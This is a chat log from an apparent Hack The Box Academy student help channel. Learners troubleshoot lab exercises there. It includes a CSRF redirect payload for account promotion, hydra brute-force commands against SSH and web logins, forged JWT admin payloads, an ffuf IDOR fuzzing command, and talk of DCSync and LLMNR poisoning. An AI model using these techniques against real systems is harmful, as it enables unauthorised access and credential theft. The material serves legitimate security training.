The tool I used to perform the LLMNR/NBT-NS poisoning earlier to obtain that user's credentials was Inveigh.

so that's what it's referring to then?

So, what they're saying is that if I go back and run net localgroup on that account in the section where we compromised it, it'll say that the account is a domain admin?

no, net localgroup will only return the local group members to you

How do I check if a user's a domain admin then? Cuz it hasn't specified so far in the module.

Guys help me
What is the account's cleartext password?
This is of IPMI of Footprinting
How to extract clear text password for this

You can use /domain. like this net group "Domain Admins" /domain

Do I replace /domain with the name of the domain? For example, /inlanefreight.local?

no.

I'll give it a go.

help me

i believe you can use net group /domain /domain:dc1.otherdomain.com, but i'm not sure

going to DM if that's okay; this channel doesn't seem to like the message I'm trying to send haha

ok

guys help me with this

Doesn't the module go over it? You can crack stuff with various tools

Do you have the hash?

yeah

can I talk to in DM?

Thanks, this worked. It returned the members of the domain admin group. I'm guessing I can run this command as pretty much any domain user?

Also, how do I check the groups the user I'm currently logged in as belongs to?

whoami /groups

Can any user run this command?

try and see

I'm assuming yes since the user I'm logged in as, htb-student, is not a domain admin.

you can check with the earlier command

it shows all of the group members

Yeah, I got it shows all domain admins members, was just wondering if a regular domain user can run the command

net group "Domain Admins" /domain

by default sure

Okay, so unless restricted, then yes. Thanks

sleep time for me 💤

Goodnight 😴

domain just restricts the ldap query to domain, you can also use localgroup and stuff like that to get information about local users and groups

Noted. Thanks!

idk how right i am about it using ldap queries. Might be wrong there, but essentially the /domain looks for users and groups in the domain account rather than the local account. I had issues before where the /domain flag was the only thing i was missing to find my next step

so actually a small thing like that can be quite important

The only thing you were missing was /domain? But if you just run net group by itself then nothing shows.

try doing net group /domain

It lists all domain groups on the domain controller.

yeah

Ahh you meant you were tryna list domain groups and you couldn't.

Thanks for sharing.

for that

Apparently NET GROUP /DOMAIN will list/search perform operations on domain groups with GLOBAL scope.
NET LOCALGROUP /DOMAIN does this only for domain groups of DOMAIN LOCAL scope. 

more like i was trying to see what groups a user account was member off, but i coulnt find the user, and i forgot it was a domain user and i forgot the /domain

hi where's the channel for me getting help about metasploit payloads?

is it apart of a academy module or ?

nope

just metasploit payloads in general

do you know any community that talks about it?

👋

Doing "Misc CSRF Exploitation", the exploit works locally but when i deliver im not getting promoted

||```html
<!DOCTYPE html>
<html>
<body>
<script>
document.location = "http:///vulnerablesite.htb:49579/admin.php?user=htb-stdnt%26promote=htb-stdnt";
</script>
</body>
</html>

Maybe a slash too many after the http?

And you should read more carefully.

oooh

but how it works fine on my browser

It mentions in the module when sending the exploit to the admin you need to remove the port.

i have been using the port in previous sections

Try it out without it

it was the slash i got it now

Awesome

tysm i cant believe im blind enough to miss it

Haha I know how that feels

Or you write vulnerabel in your payload. I had that

Has anyone done the skill assessment for the new Attacking Authentication Mechanisms?

So far I have created my own keys, used the python script provided earlier in the course with an edited payload, but it doesn't work.

this is what I have ||jwt_payload = {'user': 'htb-stdnt', 'accountType': 'admin', 'id':1234, 'iat':1718780382}||

I also tried different types of attacks from the course, bit unsure what direction is the right one lol

hmm running out of ideas, i also tried jwt tools

academy target spawning problem?

Attacking SAM in passwords attacks not spawning for me

Hey gays, I can’t open resources from DOCUMENTATION & REPORTING, could you help me?

Hello Everyone , please if anyone finished Unconstrained Delegation - Computers dm me

https://tenor.com/view/skull-fall-skeleton-disappointed-gif-15613679342612459378

just ask your question bud

waiting for machine to spawn

htb server becoming buggyday by day

im doing the service authentication brute forcing (login brute forcing/basic toolset)

i follow the steps from the previous module (personalized worlists)
generate both passwords and users

and i execute the sed scripts for the generated password txt file (william.txt)

i try to brute force but im not getting anything

i tried both hydra -l b.gates -P williams.txt -u -f ssh://<IP given> -t 4

and hydra -L bill.txt -P williams.txt -u -f ssh://<IP given> -t 4

bill.txt being the user list

not sure what im doing wrong

sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txt # remove no special chars
sed -ri '/[0-9]+/!d' william.txt            # remove no numbers```

can anyone help me on this

using top-usernames-shortlist didnt give answer
seclist's top 10 million usernames wordlist is running forever
tired the username from gitlab repo commit history, didn't work

Perhaps mention which module and section, just posting a screenshot and asking for help is just lazy

module Attacking common application
section attacking gitlab

I haven't done that module yet, sorry 🙂

got it, had to use wordlist provided in pwnbox

On 'Using CrackMapExec' - 'Basic SMB Reconnaissance' final question "What's the OS version?". Can anybody who's done this give some hint of what structure they want? I got the OS version from running cme but can't get it to accept my answer

try the whole string?

I tried the whole string "Windows 10 / xxxxxx xxxx xxxxx xxxxx xxx", did not work

without /

probably got changed since it was written

Huh, tried without the /, still incorrect

use the format under the SMB Enumeration header

Got it. Turns out using cme on my own kali vm spits out slightly different output. Tried the pwnbox and got the right format

i am stuck on this question " + 5 Compromise the Domain and read the content of \DC01\C$\Unconstrained\flag.txt " , i already get the DC ticket , and i am able to make dcsync attack , but i can't find any privileged used , i check all of the 19 available users no one on the Domain Admin gorup

did you try the administrator user

hi guys, has anyone completed the skill assessment for attacking authentication mechanisms? i'm starting to feel like its bugged... lol

if you are able to perform DCSync you will get the hash of administrator

i did it thank you

It's not. Try smarter.

hmm does my payload look correct? || {
"user": "htb-stdnt",
"accountType": "admin",
"id": 1234,
"iat": 1718795303
}||

If it does not get you the flag then you know it's not correct

I'm on the AD Enumeration & Attacks module. What do they mean by nested group membership? Reference

a group inside a group inside a group

https://tenor.com/view/matrioska-loop-bored-tired-russian-gif-7433508

Groupception

@next bronze which vpn u use

I'd recommend first doing the AD enum & attacks module if you haven't, that will give you the basics for the kerberos module

huh?

light mode

doesn't matter as long as they have decent speed and US/EU exit

🕶️

Is my message being deleted for some reason? 😅

please limit screenshots of text contents of modules that are above tier 0

sure did

Oh, alrighty, sorry.

is that not just a random example

either way there's not really a recursive search, it will just show you the first degree groups, this is where bloodhound comes in

So if we had user joe inside the "IT execs" group, which was inside another group "IT dept", which was inside the "Domain Admins" group, then he wouldn't show under a basic enumeration of domain admins, we'd have to perform a recursive enumeration to show privileged users?

My example was random, but the screenshot was from the module, and the two were in a message, so it got deleted.

So Windapsearch's -PU option isn't recursive?

  -PU, --privileged-users
                        Enumerate All privileged AD Users. Performs recursive
                        lookups for nested members.

So... it is recursive?

What did you mean by this then?

yes but only for --privileged-users

Gotcha

@next bronze do you mind if I ask what tool you use for note-taking (like for you cheatsheet when you learn from modules I mean). Is it Obsidian for this as well?

can someone tell me how to gain permission to send messages in channels T_T

#welcome

yeah I use obsidian for everything, expect for the final report

aight thanks

Mind if I ask what structure you use? Do you sort your notes by technique/methodology or what? I'm worried my current method/structure may not be scalable and I'm looking to hear from people who've completed the path and the structure they use to organize their notes, basically people who've done a lot of modules and studied a bunch.

I folders for each OS/web/services then branch into the specific techniques etc

So active directory has it's own folder?

but that doesn't matter as much, I use a plugin which lets me search through my entire vault and get what I need in a few seconds

#cpts message

How would you organize say, for example, commands from tools like crackmapexec and smbmap, there are some commands that overlap in the Active directory portion and the SMB service portion. Do you just repeat the command or link it in some sort of way?

Let's take a simple example, maybe you wanna enumerate shares, you find yourself doing it as part of your AD methodology and your SMB enumeration, the command is basically the same.

big tools like nxc/impacket/powerview gets its own notes, then it will get cross linked if a technique/attack uses it. but I find that takes too much time and is nowhere as effective as just headings search

I just headings search smb tbh, it will bring me to the sections relevant to smb

So if you're reading your method, you just mention what heading to search for and then look for that?

Btw how do you access your notes, for example, if you're at work? How do you host/sync it?

this

I have obsidian sync

Alrighty, thanks for sharing.

Can someone help me with file uploads skill assessment, I've tried so many things. If anyone has completed it please do lemme know of any tips or suggestions

got it

Hi, i am on gold annual subscription and have a question. the modules i complete on the academy for example the 28 module for CPTS, when my subscription ends. Do i will still have access to the completed modules or the whole modules will be locked again ?

btw your comment for the second sed instruction is wrong; it's removing all words from the list that don't have special characters, same with the third one, -- remove all that don't have numbers

if you 100% completed the module, you retain access

thats what the module gave

either way
i deleted those txt files and repeated it again from the beginning
and i got it

well the commands are right

your comments about what they do are not

oh

meh dont matter

im hacker now

dang this module is also fun

Hi all, I'm stuck on broken authentication via parameter modifications exercise. I've tried ffuf, intruder using custom number lists. I think there may be an issue with my ffuf syntax. Can I have some assistance?

Post your syntax here 🙂

Send syntax

ffuf -w ./id.txt -u http://94.237.54.176:37750/admin.php -X GET -H "Content-Type: text/html; charset=UTF-8" -b "PHPSESSID=rs1l95p4uki48gk59ou027024v" -d "user_id=FUZZ" -fr "Could not load admin data. Please check your privileges."

Put :FUZZ after word list

that won't make much different since there is only one

Not necessary with only one list

Ooo didn't know that thought u need to indentify it with smtg

Only with multiple lists

Is -X for post?

The method should be post though yeah

Drop the -X GET -H ... and look closely to the content

and make sure that the IP is still up

Okay, trying those

It's a get request so it needs to be part of the url

If it's meant to be get, then yeah

Post uses data

I just tried it with correct command and it should work

I just killed my exercise by opening this haha😆

let us know how it went 😄

Gains in knowledge and muscle

yeah

doing MODERN WEB EXPLOITATION TECHNIQUES - Second order - IDOR (whitebox)

it worth the price ?

I like it

so yes, for me it is worth it

nice

Got it! Thanks all

good job!!

Hello

Can you help me plsss

real jo mama?

@haughty stirrup

We aren't hacking anything for you, or recovering accounts. Reach out to the relevant support for the product you're locked out of

😭

Aaa shit then i just want to stop pedophile i just want to be bat man

We can’t help Jomama

Go let a radioactive spider bite u then

Contact police

I did and they didn't answer me

We aren't a hacker for hire server. Read #rules

Cool cool thanks anyway

Only if it's legal.

bro thinks hes Ryan Montgomery

Still follow #rules

agreed

how did you get over here if yoouve not read the # rules

I just want stop them because 30-75 years old pedophile on klepetalnica123 eh guys have a good one bye

Same reason I keep asking myself how people can be stupid enough to ask questions about their exam while it clearly states to not do it and doing so might result in termination of your exam 😄

😅 😂

is it normal in Firewall and IDS/IPS Evasion - Easy Lab i got like 50 alerts without even scanning once?

Yeah. That happens sometimes

ill just reset the machine.. lol

It's 100 to trigger the ids I think

And most stuff won't trigger more than a couple alerts

yeah... i want to trigger as lesss as possible!

trying out parameter combos! its fun

Try that on the hard lab instead of easy

well, i have to go through easy first..

Well get through them all first before worrying about optimization

on Skill Assessment - Website
"Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside? "
i have this admin login page
/admin_login.php
i execute
hydra -l user -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 83.136.253.89 -s 52898 http-post-form "/admin_login.php:username=^USER^%password=^PASS^:F=<form name='login'"

got a password but its wrong

right.. get the flags for now... good idea!

Are those thr right parameters for the log in form?

Also you're jumping all over the place, are you doing the cpts path? Or just doing as you want

ye its <ip given>/admin_login.php

oh no im still in the same path

log in brute forcing

basic toolset

Ah ok

i succesfully brute forced the first log in page
user:password

using the ftp-betterdefaultpasslist.txt

Is the username and password parameters correct as well as the fail string

then used it on the /admin_login.php page
it gave me root:root
was wrong and on the question,its hint, was that i have to use the preivous user
which was user

uhh i did this

Check page source

alr

i tried using burp but not sure what i was looking

or what to look at

What parameters are getting passed for username and password

Reread the section regarding determining login parameters

ye give me a sec

alr uhh on the page source im not sure where to look at

ye i got lost a bit

Form name

How can I exploit windows 7 eternal blue over wan I have a router

Take it slow, repeat the steps from that section

spoiler dont check || <form name='log-in' autocomplete='off' class='form' action='' method='post'> ||

#homelab-sysadm read and follow #welcome to access

Well there's why you got the false positive

why

Check your fail string

OH

@fathom pendant out of curiosity, are you working for htb lol

log-in not login

No

wow then i do really appreciate for your service and commitment

yes

I enjoy hanging out and losing braincells

why losing

Truly a mystery

only winning

htb should hire you for real

Anyway the determining parameters section tells you how to determine the username and password variables that get passed to the backend

not a spoiler anymore

might take a while because of the list

imma use the shorter ones

I would use a more common list

hm lemme check on Common-Credentials

Also your parameters are still incorrect

whaa

i changed the form name

or it isnt just that

"/login.php:[user parameter]=^USER^&[password parameter]=^PASS^:F=<form name='login'" is the base form

Fail string != parameter

oh those are parameters

Yes

Parameters are what gets passed through

The fail string is just what hydra checks

oh i see

but what do i change to what

wait lemme check again rq

You can either use page source or send a test test username/password to intercept/use browser tools to catch

ye
found it

Spoiler you goon

oh shit

Also spoiler

And...

Anyway

ye ill change em in a bit

Once you break in, the info on page is actually useful for the next assessment

i need to find the correct list though

oh alright ill keep that in mind

Common should work

any?

its taking a while thats why im saying

Ah also rockyou should work as well

It shouldn't take that long

Don't forget to use more threads

alright

oh btw this
when and why do i use this
i wanna take a note of it

It's the basic http post format

alright alright
imma note it as that

You need to adjust to each situation

so like whenever there is a brute force attack on an http - /login.php
page we use that?

On a post login yes

oh alright makes sense

is this only for hydra? or used by other tools as well?

Well hydra uses it idk what other tools syntax are as they aren't covered

hm alright

alright next module

wait how do i gain info on him
OSINT?lmao
i only know his full name

imma just use what i have

oh shit

in Firewall and IDS/IPS Evasion - Medium Lab, i found the answer. however, it seems to me that|| the answer is not a "DNS server version"..its a flag!||. Is this intended?

ye
doesnt it mention flags on your task?

https://academy.hackthebox.com/module/110/section/1086 Having a bit of trouble finding the flag.txt, i; 've ran spider and AJAX and active scan, found the high vuln but do not see a directory with flag.txt. Anyone available to help?

anyone know how to fix this? - cant start my pwnbox

Try clearing cookies or a different server

it was malwarebytes extension on my chrome

Oooh

Yo guys! I'm currently doing 'setting up' module in Information Security Foundations. Here are lot of terms, which I don't understand. External, internal pentest. VPS, some linux stuff and etc.. Should I research it all while reading or is this just an example and I'm gonna see all the definitons in other models?

Research it

Hi guys, i have a small issue with practical exercises. If i start PWNBOX and initiate the target, i do not have connection between them. Do you have some advice for me? Thanks

What module, what section and what exactly are you trying?

Module: WINDOWS FUNDAMENTALS, each practical section with tasks. I start pwnbox and target, but I don´t have ping to the target. I am trying it third day in row. I only have one attempt per day.

Hello, I'm on the "Attacking Enterprise Networks" Module and on the "Web Enumeration & Exploitation" section.
I'm trying to replicate the steps presented for ||the dev.inlanefreight.local VHOST, by adding the header found previously
but instead of retrieving the web page as seen on the module I get 408 Request Timeout Response.||
I have already tried to reset the environment multiple times but I always get the same result.
Does anyone encountered this problem ?

did you try to just connect via rdp instead of pinging?

Oh, it works. Thanks 😉

1 attempt only?

With pwnbox, but I am working now in Wmware.

daam u really took 3 min to type that

has anyone been able to do the Optional exercises in the Password Attacks module ?

they give you access to LINUX1, but you are supposed to start proxychains on MSO1 and I cannot seem to be able to connect to that machien from either LINUX1 or attack box

ah nvm I got it, but I will prob have to start bulding network topologies from now xD

im having some trouble on the web attacks skills assessment. If anyones around and could DM me to nudge me in the right direction, it would be greatly appreciated.

Hi, I am going over the HTB Academy tasks, A question: Why is the VPN connection for the target server often lost, or the target server not respond?

Eg. the Session Hijacking of XSS

I also tried from the Pwnbox but it did not bear any fruits.

sometimes these network problem is ok but it happen so regularly nowadaysthat 3 hr of work takes 6+hr

For some module, the network issues makes following the tasks mission impossible

true true

Can I have a nudge on broken auth skills assessment? I'm not sure where to go with this 2FA OTP

hey I'm doing Footprinting module of CPTS path and I'm stuck at DNS

The last question of this section is:
Q)What is the FQDN of the host where the last octet ends with "x.x.x.203"?
Ans)
dnsenum --dnsserver 10.129.104.176 --enum -p 0 -s 0 -o <output file name> -f <path of password list>- -threads 90 dev.inlanefreight.htb

but I'm very confused how to get "dev" subdomain

anybody ?

@blissful verge ?

Try to run it with a different wordlist (like one from seclists)

is there a pinned document to look at for getting started?

for when you don't know what you don't know but don't want to ask chat gpt right away?

like I m not getting on which domain I have to use different wordlists

Idk which i did but try the dev subdomain and then the root

Its frustating

It's a seclists wordlists that i know

Subdomains of subdomains

You get the initial subdomain via a proper enum

If you do a regular dig axfr you'll get a list, then there's a fierce wordlist you use against it

Google

Research

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible